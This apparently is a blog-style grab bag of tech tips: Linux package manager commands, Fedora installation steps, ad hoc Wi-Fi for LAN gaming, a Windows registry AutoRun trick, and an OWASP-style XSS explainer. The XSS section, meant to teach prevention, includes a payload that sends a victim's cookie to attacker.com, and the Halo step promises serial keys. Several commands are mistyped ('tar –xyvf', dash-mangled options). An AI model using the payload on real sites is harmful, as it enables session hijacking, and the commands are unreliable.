     YUM: Yum is an automatic updater and package installer/remover for rpm systems. It automatically computes dependencies and figures out what things should occur to install packages. It makes it easier to maintain groups of machines without having to manually update each one using rpm. Yum has a plugin interface for adding simple features. Yum can also be used from other python programs via its module interface.

INSTALLATION through YUM: First open Terminal of your Linux

      1)      Get super user privilege by Typing “su -” (su [space]-) without quotes and press Enter .Here su stands for sudo.(you can first type sudo[enter] and then type yum links)

      2)       Type yum download link and press Enter. Download starts, it will ask you for installation                                       press  [y][Enter].

      3)      Your application will download and install automatically

RPM Package Manager (RPM): is a package management system. The name RPM variously refers to the .rpm file format, files in this format, software packaged in such files, and the package manager itself. RPM was intended primarily for GNU/Linux distributions; the file format is the baseline package format of the Linux Standard Base.

INSTALLATION through RPM: For installing a software package, you use the rpm command with -i option (which stands for "install"). For example,

1).To install an RPM package called software-2.3.4.rpm:
# rpm -i software-2.3.4.rpm

2).If you already have some version installed on your system and want to upgrade it to the new version, you use -U option instead (which stands for "upgrade"). For example, if you have software-2.3.3.rpm installed and want to upgrade it:
# rpm -U software-2.3.4.rpm

3).If you know the needed files are there and RPM is just being stupid, you can ignore the dependencies. Use the --nodeps option if you want to tell RPM not to check any dependencies before installing the package:
# rpm -i software-2.3.4.rpm –nodeps

4).To remove software that was installed with RPM, you use the -e option (which stands for "erase"):
# rpm -e software-2.3.4

5). As you already know, the RPM database contains a list of all installed RPM packages on your system. You can query this database to get info of the packages on your Linux system. To query a single package, you use the -q option. For example, to query a package whose name is "software":
# rpm -q software

6). If you want a list of all packages installed on your system, you'll have to query all with -qa:
# rpm –qa

7). if you're looking for packages whose names contain a specific word, you can use grep for finding those packages. For example, to get a list of all installed RPM packages whose names contain the word "kde", you could do something like this:
# rpm -qa | grep kde

APT INSTALATION: The Advanced Packaging Tool, or APT, is a free user interface that works with core libraries to handle the installation and removal of software on the Debian GNU/Linux distribution and its variants.apt-get is so easy because it not only keeps track of what packages are installed, but also what other packages are available. It will even download them from the Internet for you (if properly configured).

            1).To install apt package

apt-get install ${packagename}

2).To remove software is just as easy:

Apt-get remove ${packagename}

3). APT keeps a local database on your hard drive with a list of all available packages and where to find them. This database needs to be explicitly updated. To update the APT database:

Apt-get update

4). For upgrading all package:

Apt-get upgrade

Mandriva: urpm INSTALLATION:

Mandriva Linux (formerly Mandrake and Connectiva) has a toolset similar to APT called urpmi.

1). To install software:

urpmi  ${packagename}

2). To remove software:

urpme ${packagename}

3). To update the local database:

urpmi.update –a

4). To install security updates and bug fix:

Urpmi –auto-select

Tar Balls INSTALLATION: A tar ball is a (usually compressed) archive of files, similar to a Zip file on Windows or a Sit on the Mac. Tar balls come in files that end in .tar, .tar.gz, .tgz or something along these lines. To unpack a tar ball, use this command.

tar –xyvf ${packagename}.tar.gz

How to install Fedora Linux:

Hey guys, I m gonna tell you how to install fedora on your system along with windows and then in other posts I’ll tell you how to in install application on fedora and there links, about setting privileges to users , setting wlan, managing wifi, YUM , RPM and many other important issues with Linux.

      

     Here are some steps, for installation fallow these step:

Step1: Set priority of your bootable information drive (Through BIOS setting).

Step2: Insert CD/DVD or bootable flash drive (You can create it with LinuxLive software, Link for LinuxLive is given in Important links section) of fedora.

Step3:  After finding MBR, It will take few seconds for booting and then fedora will give you two option
     1)      Try Fedora   and   2) Install to hard drive.

As appears in Screenshot .you can try it as live OS but here we are interested in “Install to hard drive”, so click on Install to hard Drive.

Step 4: Select the appropriate keyboard layout and click on Next.

Step 5: Select Storage device, for using it on Laptop select Basic Storage Device. Other option will allow you to install fedora on another place like (SANs)

Step 6: Name your computer and click on Next

Step7: Select your time zone.

                                 

Step 8: Enter a password for root (Super User).

Step 9: Select the type of installation as per your schema (For running with along with windows select “use free space or create custom layout”).

Step 10: Conformation to changes.

Step 11: Copying live image to hard drive.

Step 12: Completion of copying 

Step 13: Completion of Fedora installation.

Step 14: Welcome to fedora click on forward. 

Step 15: Licence Information click on forward.

Step 16: Create User; fill the form click on forward.

Step 17: Set Time and date.

Step 18: Hardware Profile click on finish.

Step 19: Here is your login page.

Step 20: your Desktop………………….Here Fedora is ready to use

How to play counter strike or Halo on wlan. OR How to make wlan to share the Data.

Hey guys, we oftentimes need to connect two or More computers with the LAN.  I am explaining you how to connect computers in to a LAN. And How to play Counter Strike .Here are some step are given below, just fallow 'em  And you are done.

TASK 1: wLAN connection

Step1: Turn on your WIFI.

Step2: Go to the control panel -> Network and Internet -> Manage Wireless Networks.

Step3: Click on the Add.

Step4: Click on Create an ad hoc network->Next->

Step5: A window as shown into figure will open. Write network name as you wish.  Next TAB is Security type. Select any of them (No Authentication, WEP or WAP2-Personal) provide a security key (as per selection of security key) like password.

Step6: Click on Next-> Your Network is ready to use.

Step7:  Go to the control panel -> Network and Internet -> Manage Wireless Networks.

Step 8: Click on the Adaptor properties->Internet Protocol Version 4(TCP/IPv4)

Step9: Set the IP address as 192.168.1.X and subnet mask As 255.255.255.0 (X can be any number   1-254, different computers have different IP by changing X in IP and subnet mask will remain same) click on OK. Close all other window and your LAN connection is done you can see a network of yours is in wireless network connection.

TASK 2: How to play counter strike on LAN.

Step1: Install Counter Strike in each system.

Step2: Create a server by clicking on New Game.

Step 3: To join the game press consol button (~ the button below Esc).and type “connect  Server IP:Port no” port no will be 27015.

For Example: connect 192.168.1.2:27015

Step 4:press enter and you are in the game.

TASK3: How to play Halo on LAN.

Step1: Install Halo in each system with different serial key. Here some keys of Halo is given below.

How to give your own default message on cmd prompt ?:Removing "Microsoft Windows [Version 6.1.7601]

Hey there,
To do the above trick:
1. Open registry Editor : run-> regedit.exe
2. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
3. Make a new key with "String value" : Right click on "Command Processor" -> new -> String value

4. Rename the key as "AutoRun"
5. Modify the key value with "cls" to remove the windows default message and then press OK
6. If u want to show your own message change the value of "AutoRun" with:
"cls&&@echo off&&echo Your Message"
7. If u are familiar with the DOS commands then use them on "AutoRun" value by saperating them using "&&"
for example:"cls&&@echo off&&echo .::Ready for a ride on Black Perl: This is "Jack Sparrow"::.&&@echo on&&prompt ?"
Note: "&&" is used for concatination of two "values" (that are in this case DOS commands). 

XSS(CROSS-SITE SCRIPTING)

XSS flaws occur whenever an application takes untrusteddata and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

1)who is Vulnerable to XSS:

You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content that might get executed.Both static and dynamic tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and manual penetration testing, in addition to any automated approaches in use.Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.

2)How to Prevent XSS attacks:

Preventing XSS requires keeping untrusteddata separate from active browser content.

1.The preferred option is to properly escape all untrusteddata based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them.

2.Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications must accept special characters. Such validation should decode any encoded input, and then validate the length, characters, and format on that data before accepting the input.

3.Consider employing Mozilla’s new Content Security Policy that is coming out in Firefox 4 to defend against XSS.

3)Attack scenario with example:

The application uses untrusteddata in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See A5 for info on CSRF.
